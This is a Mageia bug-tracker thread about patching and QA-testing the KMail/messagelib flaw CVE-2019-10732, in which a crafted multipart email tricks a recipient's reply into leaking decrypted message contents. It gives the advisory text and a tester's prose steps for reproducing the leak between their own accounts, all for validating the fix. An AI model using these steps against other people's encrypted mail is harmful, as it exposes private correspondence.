openSUSE has issued an advisory today (January 30): https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/UIP7JD6E7AKTOSG2IAFVY4AE7G4NZIKB/ They added this patch to fix it: https://build.opensuse.org/package/view_file/openSUSE:Leap:15.1:Update/messagelib/CVE-2019-10732.patch?expand=1
link to the upstream commit : https://github.com/KDE/messagelib/commit/8f9b85b664be0987014c5d2485e706ab5a198e1b
CC: (none) => mageia
The real commit is this one https://github.com/KDE/messagelib/commit/a58286aec8f300d78c570726924baa91d9a22771
CC: (none) => geiger.david68210
Done for mga7!
Advisory: ======================== Updated messagelib packages fix security vulnerability: In KDE KMail, an attacker in possession of S/MIME or PGP encrypted emails can wrap them as sub-parts within a crafted multipart email. The encrypted part(s) can further be hidden using HTML/CSS or ASCII newline characters. This modified multipart email can be re-sent by the attacker to the intended receiver. If the receiver replies to this (benign looking) email, they unknowingly leak the plaintext of the encrypted message part(s) back to the attacker (CVE-2019-10732). References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10732 https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/UIP7JD6E7AKTOSG2IAFVY4AE7G4NZIKB/ ======================== Updated packages in core/updates_testing: ======================== messagelib-19.04.0-1.1.mga7 libkf5messagecomposer5-19.04.0-1.1.mga7 libkf5messagecore5-19.04.0-1.1.mga7 libkf5messagelist5-19.04.0-1.1.mga7 libkf5messageviewer5-19.04.0-1.1.mga7 libkf5templateparser5-19.04.0-1.1.mga7 libkf5mimetreeparser5-19.04.0-1.1.mga7 libkf5webengineviewer5-19.04.0-1.1.mga7 libkf5messagelib-devel-19.04.0-1.1.mga7 from messagelib-19.04.0-1.1.mga7.src.rpm
Assignee: kde => qa-bugs
david are you sure ? this is not what is written here: https://security-tracker.debian.org/tracker/CVE-2019-10732
Yes sure, see https://github.com/KDE/messagelib/commits/Applications/19.04 Commits on May 12, 2019 - Merge branch 'CVE-2019-10732' into Applications/19.04
If you look ar the patch, it's actually multiple commits.
PoC in upstream Github. On MGA7 Plasma x86_64. KMail already set up. Sending to myself an encrypted mail (Use 2 email accounts) from KMail with account 1. Use Thunderbird (which has not the private Key from account 1) to resend this encrypted mail as attachment to me with account 2 to account 1. In KMail, see the message from Thunderbird with encrypted mail as attachment. Use reply in KMail to account 2. On Thunderbird (account 2): see previously encrypted attached mail as decrypted! Using QA Repo Use new mail. Send crypted and signed emails. OK Basic functionality is same. Redo above test. At final, the previously encrypted attached mail is still encrypted. Give this an OK. MGA7-64-OK Validating Advisory pushed to SVN.
Whiteboard: (none) => MGA7-64-OKCVE: (none) => CVE-2019-10732CC: (none) => ouaurelien, sysadmin-bugsKeywords: (none) => advisory, validated_update
An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2021-0067.html
Status: NEW => RESOLVEDResolution: (none) => FIXED